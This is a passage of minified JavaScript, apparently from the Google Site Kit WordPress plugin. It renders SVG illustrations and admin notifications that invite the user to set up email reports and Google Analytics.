82.291)"}),ie.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.237,d:"m128.264 92.214 4.486-6.25m0 0-4.244.636m4.244-.635.755 4.224"}),ie.createElement("rect",{width:16.5,height:4.95,x:137.955,y:85.049,fill:"#fff",rx:1.65,transform:"rotate(-9.325 137.955 85.049)"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-desktop_svg__g)"},ie.createElement("path",{fill:"#fff",d:"M75.352 82.647c0-1.968 2.17-3.163 3.833-2.11l90.363 57.192a8.33 8.33 0 0 0 8.904 0l90.363-57.192c1.663-1.053 3.833.142 3.833 2.11v94.528a8.325 8.325 0 0 1-8.325 8.325H83.676a8.325 8.325 0 0 1-8.324-8.325z"})),ie.createElement("path",{stroke:"#EBEEF0",strokeOpacity:.75,strokeWidth:2.497,d:"m78.682 183.003 64.933-62.436M269.318 183.003l-64.933-62.436"}))),ve||(ve=ie.createElement("defs",null,ie.createElement("filter",{id:"email-reporting-overlay-desktop_svg__b",width:229.297,height:191.646,x:59.352,y:17.854,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:8}),ie.createElement("feGaussianBlur",{stdDeviation:8}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0.193775 0 0 0 0 0.34389 0 0 0 0 0.252153 0 0 0 0.2 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_623_10575"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_623_10575",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-desktop_svg__c",width:123.366,height:118.517,x:56.947,y:-62.574,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:3.3}),ie.createElement("feGaussianBlur",{stdDeviation:6.6}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_623_10575"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_623_10575",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-desktop_svg__d",width:116.565,height:89.335,x:153.753,y:-7.151,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:3.3}),ie.createElement("feGaussianBlur",{stdDeviation:6.6}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_623_10575"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_623_10575",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-desktop_svg__e",width:122.839,height:105.872,x:137.58,y:69.864,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:3.3}),ie.createElement("feGaussianBlur",{stdDeviation:6.6}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_623_10575"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_623_10575",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-desktop_svg__f",width:119.774,height:94.207,x:89.824,y:34.756,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:3.3}),ie.createElement("feGaussianBlur",{stdDeviation:6.6}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_623_10575"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_623_10575",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-desktop_svg__g",width:223.936,height:131.994,x:62.032,y:63.496,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:-3.33}),ie.createElement("feGaussianBlur",{stdDeviation:6.66}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.05 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_623_10575"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_623_10575",result:"shape"})),ie.createElement("clipPath",{id:"email-reporting-overlay-desktop_svg__a"},ie.createElement("path",{fill:"#fff",d:"M0 16C0 7.163 7.163 0 16 0h316c8.837 0 16 7.163 16 16v147H0z"})))));var Be,He;function We(){return We=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},We.apply(null,arguments)}const _e=e=>ie.createElement("svg",We({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 343 104"},e),Be||(Be=ie.createElement("g",{clipPath:"url(#email-reporting-overlay-mobile_svg__a)"},ie.createElement("path",{fill:"#B8E6CA",d:"M304.553 64.365c2.4 22.73-4.803 32.78-23.025 59.949-18.222 27.17 7.404 59.277-20.779 89.869-33.528 36.394-150.686 39.364-201.232 24.212C8.97 223.242-4.063 191.922-.431 163.24 4.5 124.314 27.02 123.577 40 104.5c19.276-28.325 1.687-66.286 39-89s80.086 6.697 120.326 4.388c23.216-1.332 46.017-5.627 66.626.968 20.832 6.667 36.719 25.428 38.601 43.509"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-mobile_svg__b)"},ie.createElement("path",{fill:"#EBEEF0",d:"M97.55 54.93a6.28 6.28 0 0 1 3.274-5.515l66.361-36.214a10.05 10.05 0 0 1 9.631 0l66.361 36.214a6.28 6.28 0 0 1 3.273 5.515v71.244a6.283 6.283 0 0 1-6.283 6.283H103.833a6.283 6.283 0 0 1-6.282-6.283z"})),ie.createElement("g",{filter:"url(#email-reporting-overlay-mobile_svg__c)"},ie.createElement("rect",{width:65.659,height:43.018,x:169.907,y:3.573,fill:"#fff",rx:6.849,transform:"rotate(5.072 169.907 3.573)"})),ie.createElement("rect",{width:39.244,height:5.283,x:178.812,y:14.213,fill:"#EBEEF0",rx:2.49,transform:"rotate(5.072 178.812 14.213)"}),ie.createElement("rect",{width:31.131,height:12.452,x:178.013,y:24.92,fill:"#FFDED3",rx:6.226,transform:"rotate(5.072 178.013 24.92)"}),ie.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:.934,d:"m183.207 29.756 3.726 4.452m0 0 .332-3.222m-.332 3.222-3.229-.24"}),ie.createElement("rect",{width:12.452,height:3.736,x:191.272,y:30.472,fill:"#fff",rx:1.245,transform:"rotate(5.072 191.272 30.472)"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-mobile_svg__d)"},ie.createElement("rect",{width:65.659,height:43.018,x:168.165,y:50.631,fill:"#fff",rx:6.849,transform:"rotate(21.428 168.165 50.631)"})),ie.createElement("rect",{width:15.565,height:4.981,x:173.799,y:63.543,fill:"#EBEEF0",rx:2.49,transform:"rotate(21.428 173.799 63.543)"}),ie.createElement("rect",{width:31.131,height:12.452,x:169.932,y:73.397,fill:"#FFDED3",rx:6.226,transform:"rotate(21.428 169.932 73.397)"}),ie.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:.934,d:"m173.554 79.5 2.322 5.321m0 0 1.225-2.998m-1.225 2.998-3.032-1.14"}),ie.createElement("rect",{width:12.452,height:3.736,x:181.091,y:82.458,fill:"#fff",rx:1.245,transform:"rotate(21.428 181.091 82.458)"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-mobile_svg__e)"},ie.createElement("rect",{width:66.413,height:43.018,x:117.415,y:35.905,fill:"#fff",rx:6.849,transform:"rotate(-9.325 117.415 35.905)"})),ie.createElement("rect",{width:30.943,height:5.283,x:128.687,y:43.996,fill:"#EBEEF0",rx:2.49,transform:"rotate(-9.325 128.687 43.996)"}),ie.createElement("rect",{width:31.131,height:12.452,x:130.575,y:54.565,fill:"#B8E6CA",rx:6.226,transform:"rotate(-9.325 130.575 54.565)"}),ie.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:.934,d:"m137.483 62.054 3.386-4.716m0 0-3.203.48m3.203-.48.57 3.188"}),ie.createElement("rect",{width:12.452,height:3.736,x:144.797,y:56.647,fill:"#fff",rx:1.245,transform:"rotate(-9.325 144.797 56.647)"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-mobile_svg__f)"},ie.createElement("path",{fill:"#fff",d:"M97.55 54.834c0-1.485 1.639-2.387 2.894-1.593l68.196 43.163a6.28 6.28 0 0 0 6.72 0l68.197-43.163c1.255-.794 2.893.108 2.893 1.593v71.34a6.283 6.283 0 0 1-6.283 6.283H103.833a6.283 6.283 0 0 1-6.282-6.283z"})),ie.createElement("path",{stroke:"#EBEEF0",strokeOpacity:.75,strokeWidth:1.885,d:"m100.063 130.572 49.005-47.12M243.937 130.572l-49.005-47.12"}))),He||(He=ie.createElement("defs",null,ie.createElement("filter",{id:"email-reporting-overlay-mobile_svg__b",width:173.05,height:144.635,x:85.476,y:5.935,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:6.038}),ie.createElement("feGaussianBlur",{stdDeviation:6.038}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0.193775 0 0 0 0 0.34389 0 0 0 0 0.252153 0 0 0 0.2 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_1164_30170"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_1164_30170",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-mobile_svg__c",width:87.972,height:67.421,x:156.721,y:-3.32,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:2.49}),ie.createElement("feGaussianBlur",{stdDeviation:4.981}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_1164_30170"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_1164_30170",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-mobile_svg__d",width:92.706,height:79.901,x:144.515,y:45.187,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:2.49}),ie.createElement("feGaussianBlur",{stdDeviation:4.981}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_1164_30170"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_1164_30170",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-mobile_svg__e",width:90.393,height:71.098,x:108.472,y:18.69,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:2.49}),ie.createElement("feGaussianBlur",{stdDeviation:4.981}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_1164_30170"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_1164_30170",result:"shape"})),ie.createElement("filter",{id:"email-reporting-overlay-mobile_svg__f",width:169.004,height:99.615,x:87.499,y:40.381,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},ie.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),ie.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),ie.createElement("feOffset",{dy:-2.513}),ie.createElement("feGaussianBlur",{stdDeviation:5.026}),ie.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),ie.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.05 0"}),ie.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_1164_30170"}),ie.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_1164_30170",result:"shape"})),ie.createElement("clipPath",{id:"email-reporting-overlay-mobile_svg__a"},ie.createElement("path",{fill:"#fff",d:"M0 0h343v104H0z"}))))),Ve="email_reports_setup_overlay_notification";function SetUpEmailReportingOverlayNotification({id:e,Notification:i}){const t=(0,o.useSelect)(e=>e(Ue.n).getValue(Pe.Q)),n=(0,Re.A)(t),{setValue:a}=(0,o.useDispatch)(Ue.n),{dismissNotification:r}=(0,o.useDispatch)(s.D),I=(0,ie.useCallback)(()=>{a(Pe.Q,!0)},[a]),l={target:".googlesitekit-user-selector",placement:"bottom-end",className:"googlesitekit-tour-tooltip--user-menu",tooltipSlug:Ve,title:(0,K.__)("You can always manage your email reports subscription from the user menu","google-site-kit"),dismissLabel:(0,K.__)("Got it","google-site-kit")},c=(0,pe.i)(l),g=(0,ie.useCallback)(()=>{c()},[c]),u=(0,o.useSelect)(e=>e(M.oR).isEmailReportingSubscribed());return(0,ie.useEffect)(()=>{n&&!t&&(r(e),u||setTimeout(()=>{c()},310))},[n,t,r,e,u,c]),(0,q.jsx)(i,{children:(0,q.jsx)(Ge.A,{notificationID:e,title:(0,K.__)("Get site insights in your inbox","google-site-kit"),description:(0,K.__)("Receive the most important insights about your site’s performance, key trends, and tailored metrics directly in your inbox","google-site-kit"),GraphicDesktop:Ye,GraphicMobile:_e,ctaButton:{label:(0,K.__)("Set up","google-site-kit"),onClick:I,dismissOnClick:!0},dismissButton:{label:(0,K.__)("Maybe later","google-site-kit"),onClick:g},newBadge:!0})})}SetUpEmailReportingOverlayNotification.propTypes={id:Ne().string.isRequired,Notification:Ne().elementType.isRequired};var Je=t(65929),Fe=t(97015);const Xe=({id:e,Notification:i})=>{const t={tooltipSlug:e,title:(0,K.__)("You can always set up Analytics from Settings later","google-site-kit"),dismissLabel:(0,K.__)("Got it","google-site-kit")},n=(0,pe.i)(t),a=(0,o.useSelect)(i=>i(s.D).isNotificationDismissalFinal(e)),r=(0,o.useSelect)(e=>{const i=e(H.K9).getAdminReauthURL();return!!i&&e(oe.M).isNavigatingTo(i)}),I=(0,o.useSelect)(e=>e(B.i).isFetchingSetModuleActivation(W.L1,!0)),l=(0,Je.A)(W.L1),M=I||r;return Fe.createElement(i,null,Fe.createElement($.A,{notificationID:e,title:(0,K.__)("Understand how visitors interact with your content","google-site-kit"),description:(0,K.__)("Get a deeper understanding of your customers. Google Analytics gives you the free tools you need to analyze data for your business in one place.","google-site-kit"),ctaButton:{label:(0,K.__)("Set up Analytics","google-site-kit"),onClick:l,disabled:M,inProgress:M,dismissOnClick:!0,dismissOptions:{expiresInSeconds:0,skipHidingFromQueue:!0}},dismissButton:{label:a?(0,K.__)("Don’t show again","google-site-kit"):(0,K.__)("Maybe later","google-site-kit"),onClick:n,disabled:M,dismissOptions:{expiresInSeconds:a?0:2*se.Du}},svg:{desktop:"data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAwIiBoZWlnaHQ9IjMzNSIgdmlld0JveD0iMCAwIDQwMCAzMzUiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CjxwYXRoIGQ9Ik0zNzEuNjMgMTc5LjM3N0MzNjEuODQ5IDIyNi40NzIgMzE2LjU0MiAyNjguNTY3IDI2NS40MTQgMjU1LjM1MkMyMTQuMjg2IDI0Mi4xMzYgMjEzLjQ5NSAxOTUuOTY5IDE4Mi45NzkgMTgyLjc3M0MxNTIuNDYzIDE2OS41NzcgMTM2Ljg2OCAxOTUuMDE3IDEwMC4zMTcgMTg1LjI5OEM2My43NjYyIDE3NS41OCAzNC45OTY1IDE0My42NTEgMzUgOTQuMzQ0MkMzNS4wMDM1IDQ1LjAzNzYgODIuMzU1IDIuMTUxMDUgMTI0LjQxOCA2LjI3NDgzQzE2Ni40OCAxMC4zOTg2IDE4MS4zMjYgMzkuMjYzNSAyMTMuNDkyIDQ2LjY4NzJDMjQ1LjY1NyA1NC4xMTA4IDI2Mi45NzYgMzUuOTY1NyAyOTcuNjE1IDQwLjkxNDZDMzc5LjY5IDUyLjY0MSAzODEuNDEgMTMyLjI4MSAzNzEuNjMgMTc5LjM3N1oiIGZpbGw9IiNEMEZCRTEiLz4KPGcgZmlsdGVyPSJ1cmwoI2ZpbHRlcjBfZF81MDE5XzE2NTQ4KSI+CjxyZWN0IHg9Ijg0IiB5PSI5NiIgd2lkdGg9IjIyOSIgaGVpZ2h0PSIxOTAiIHJ4PSIxMi41MTI4IiBmaWxsPSIjRUJFRUYwIi8+CjxtYXNrIGlkPSJtYXNrMF81MDE5XzE2NTQ4IiBzdHlsZT0ibWFzay10eXBlOmFscGhhIiBtYXNrVW5pdHM9InVzZXJTcGFjZU9uVXNlIiB4PSI4MyIgeT0iOTYiIHdpZHRoPSIyMzEiIGhlaWdodD0iMjM0Ij4KPHJlY3QgeD0iODMuNzY1NiIgeT0iOTYiIHdpZHRoPSIyMjkuMzc4IiBoZWlnaHQ9IjIzMy4yMDEiIHJ4PSIxMi41MTI4IiBmaWxsPSIjREVFM0U2Ii8+CjwvbWFzaz4KPGcgbWFzaz0idXJsKCNtYXNrMF81MDE5XzE2NTQ4KSI+CjxyZWN0IHg9IjIzMC44NDIiIHk9IjEzMi4yMSIgd2lkdGg9IjY1Ljg1OTciIGhlaWdodD0iNjQuNzQzNCIgcng9IjQuMDUwMzUiIGZpbGw9IndoaXRlIi8+CjxyZWN0IHg9IjI1NS4wODIiIHk9IjE4NS4wOTciIHdpZHRoPSIxNy41NTE1IiBoZWlnaHQ9IjQuMDUwMzUiIHJ4PSIxLjM1MDEyIiBmaWxsPSIjQkVENEZGIi8+CjxjaXJjbGUgY3g9IjI2My44NTgiIGN5PSIxNjAuMTIiIHI9IjE0LjE3NjIiIHN0cm9rZT0iI0JFRDRGRiIgc3Ryb2tlLXdpZHRoPSI0LjA1MDM1Ii8+CjxwYXRoIGQ9Ik0yNzguMDM0IDE2MC4xMkMyNzguMDM0IDE2Ny45NDkgMjcxLjY4NyAxNzQuMjk2IDI2My44NTggMTc0LjI5NkMyNTYuMDI5IDE3NC4yOTYgMjQ5LjY4MiAxNjcuOTQ5IDI0OS42ODIgMTYwLjEyQzI0OS42ODIgMTUyLjI5MSAyNTYuMDI5IDE0NS45NDQgMjYzLjg1OCAxNDUuOTQ0IiBzdHJva2U9IiM3RjlDRDQiIHN0cm9rZS13aWR0aD0iNC4wNTAzNSIgc3Ryb2tlLWxpbmVjYXA9InJvdW5kIi8+CjxyZWN0IHg9Ijk4LjAwNTkiIHk9IjIwNS44ODMiIHdpZHRoPSI2NS44NTk3IiBoZWlnaHQ9IjY0Ljc0MzQiIHJ4PSI0LjA1MDM1IiBmaWxsPSJ3aGl0ZSIvPgo8cmVjdCB4PSIxMjIuODIzIiB5PSIyNTguMDA0IiB3aWR0aD0iMTcuNTUxNSIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgZmlsbD0iI0JFRDRGRiIvPgo8Y2lyY2xlIGN4PSIxMzEuNTk5IiBjeT0iMjMzLjAyNiIgcj0iMTQuMTc2MiIgc3Ryb2tlPSIjQkVENEZGIiBzdHJva2Utd2lkdGg9IjQuMzQ3MzgiLz4KPHBhdGggZD0iTTEyNi44MjggMjQ2LjM3NUMxMTkuNDU2IDI0My43NCAxMTUuNjE1IDIzNS42MjcgMTE4LjI1MSAyMjguMjU1QzEyMC44ODYgMjIwLjg4MiAxMjguOTk5IDIxNy4wNDIgMTM2LjM3MSAyMTkuNjc3IiBzdHJva2U9IiM3RjlDRDQiIHN0cm9rZS13aWR0aD0iNC4wNTAzNSIgc3Ryb2tlLWxpbmVjYXA9InJvdW5kIi8+CjxyZWN0IHg9Ijk4LjAwNTkiIHk9IjEzMi4yMSIgd2lkdGg9IjEyMi43ODkiIGhlaWdodD0iNjQuNzQzNCIgcng9IjQuMDUwMzUiIGZpbGw9IndoaXRlIi8+CjxyZWN0IHg9IjEwNC44NTciIHk9IjE0MS44OTQiIHdpZHRoPSI1OC4wNTUiIGhlaWdodD0iNC4wNTAzNSIgcng9IjEuMzUwMTIiIGZpbGw9IiNCRUQ0RkYiLz4KPHJlY3QgeD0iMTA0Ljg1NyIgeT0iMTQ5Ljk5NSIgd2lkdGg9IjM3LjgwMzMiIGhlaWdodD0iNC4wNTAzNSIgcng9IjEuMzUwMTIiIGZpbGw9IiNCRUQ0RkYiLz4KPG1hc2sgaWQ9Im1hc2sxXzUwMTlfMTY1NDgiIHN0eWxlPSJtYXNrLXR5cGU6YWxwaGEiIG1hc2tVbml0cz0idXNlclNwYWNlT25Vc2UiIHg9IjEwNCIgeT0iMTU5IiB3aWR0aD0iMTExIiBoZWlnaHQ9IjMyIj4KPHJlY3QgeD0iMTA0LjcwNCIgeT0iMTU5IiB3aWR0aD0iMTA5LjM5NCIgaGVpZ2h0PSIzMS4yNTU0IiByeD0iMi43MDAyMyIgZmlsbD0id2hpdGUiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2sxXzUwMTlfMTY1NDgpIj4KPHBhdGggZD0iTTExOC45NzcgMTg0Ljg3NUMxMDguMzgxIDE4NC44NzUgMTA0LjE0NiAxODIuNDE0IDEwMS4zNTYgMTc5Ljk1MlYxOTQuNzJIMjE2LjMzMlYxNjguODIzQzIxNS40NTEgMTY3LjA0NSAyMTMuMzA0IDE2Mi4zNDkgMjA1LjggMTYyLjM0OUMxOTYuMTA4IDE2Mi4zNDkgMTg4LjI0NiAxODEuMTgzIDE3My43NjUgMTgxLjE4M0MxNTkuMjgzIDE4MS4xODMgMTU3LjUyOCAxNzIuMTU4IDE0OS4xOSAxNzIuMTU4QzEzOC42NTggMTcyLjE1OCAxMzIuNjMzIDE4NC44NzUgMTE4Ljk3NyAxODQuODc1WiIgZmlsbD0iI0JFRDRGRiIgc3Ryb2tlPSIjN0Y5Q0Q0IiBzdHJva2Utd2lkdGg9IjQuMDUwMzUiLz4KPHBhdGggZD0iTTE1Mi45OTMgMTcxLjU5NkMxNTIuOTkzIDE3My44MzMgMTUxLjE4IDE3NS42NDYgMTQ4Ljk0MyAxNzUuNjQ2QzE0Ni43MDYgMTc1LjY0NiAxNDQuODkzIDE3My44MzMgMTQ0Ljg5MyAxNzEuNTk2QzE0NC44OTMgMTY5LjM1OSAxNDYuNzA2IDE2Ny41NDUgMTQ4Ljk0MyAxNjcuNTQ1QzE1MS4xOCAxNjcuNTQ1IDE1Mi45OTMgMTY5LjM1OSAxNTIuOTkzIDE3MS41OTZaIiBmaWxsPSIjN0Y5Q0Q0Ii8+CjwvZz4KPHJlY3QgeD0iMTczLjkxMiIgeT0iMjA1Ljg4MyIgd2lkdGg9IjEyMi43ODkiIGhlaWdodD0iNjQuNzQzNCIgcng9IjQuMDUwMzUiIGZpbGw9IndoaXRlIi8+CjxyZWN0IHg9IjE4MC44NzgiIHk9IjIxNC44IiB3aWR0aD0iMjUuNjUyMiIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgZmlsbD0iI0JFRDRGRiIvPgo8cmVjdCB4PSIxODAuODc4IiB5PSIyMjIuOTAxIiB3aWR0aD0iMTMuNTAxMiIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgZmlsbD0iI0JFRDRGRiIvPgo8cmVjdCB4PSIxODguMjc2IiB5PSIyNjAuNzA0IiB3aWR0aD0iMTYuMjAxNCIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgdHJhbnNmb3JtPSJyb3RhdGUoLTkwIDE4OC4yNzYgMjYwLjcwNCkiIGZpbGw9IiNCRUQ0RkYiLz4KPHJlY3QgeD0iMTk5LjA3NyIgeT0iMjYwLjcwNCIgd2lkdGg9IjguMTAwNyIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgdHJhbnNmb3JtPSJyb3RhdGUoLTkwIDE5OS4wNzcgMjYwLjcwNCkiIGZpbGw9IiNCRUQ0RkYiLz4KPHJlY3QgeD0iMjA5Ljg3OSIgeT0iMjYwLjcwNCIgd2lkdGg9IjguMTAwNyIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgdHJhbnNmb3JtPSJyb3RhdGUoLTkwIDIwOS44NzkgMjYwLjcwNCkiIGZpbGw9IiNCRUQ0RkYiLz4KPHJlY3QgeD0iMjIwLjY4IiB5PSIyNjAuNzA0IiB3aWR0aD0iMTAuODAwOSIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgdHJhbnNmb3JtPSJyb3RhdGUoLTkwIDIyMC42OCAyNjAuNzA0KSIgZmlsbD0iIzdGOUNENCIvPgo8cmVjdCB4PSIyMzEuNDgiIHk9IjI2MC43MDQiIHdpZHRoPSIxNi4yMDE0IiBoZWlnaHQ9IjQuMDUwMzUiIHJ4PSIxLjM1MDEyIiB0cmFuc2Zvcm09InJvdGF0ZSgtOTAgMjMxLjQ4IDI2MC43MDQpIiBmaWxsPSIjN0Y5Q0Q0Ii8+CjxyZWN0IHg9IjI0Mi4yODEiIHk9IjI2MC43MDQiIHdpZHRoPSIyMC4yNTE4IiBoZWlnaHQ9IjQuMDUwMzUiIHJ4PSIxLjM1MDEyIiB0cmFuc2Zvcm09InJvdGF0ZSgtOTAgMjQyLjI4MSAyNjAuNzA0KSIgZmlsbD0iIzdGOUNENCIvPgo8cmVjdCB4PSIyNTMuMDgzIiB5PSIyNjAuNzA0IiB3aWR0aD0iMjQuMzAyMSIgaGVpZ2h0PSI0LjA1MDM1IiByeD0iMS4zNTAxMiIgdHJhbnNmb3JtPSJyb3RhdGUoLTkwIDI1My4wODMgMjYwLjcwNCkiIGZpbGw9IiM3RjlDRDQiLz4KPHJlY3QgeD0iMjYzLjg4NCIgeT0iMjYwLjcwNCIgd2lkdGg9IjIwLjI1MTgiIGhlaWdodD0iNC4wNTAzNSIgcng9IjEuMzUwMTIiIHRyYW5zZm9ybT0icm90YXRlKC05MCAyNjMuODg0IDI2MC43MDQpIiBmaWxsPSIjN0Y5Q0Q0Ii8+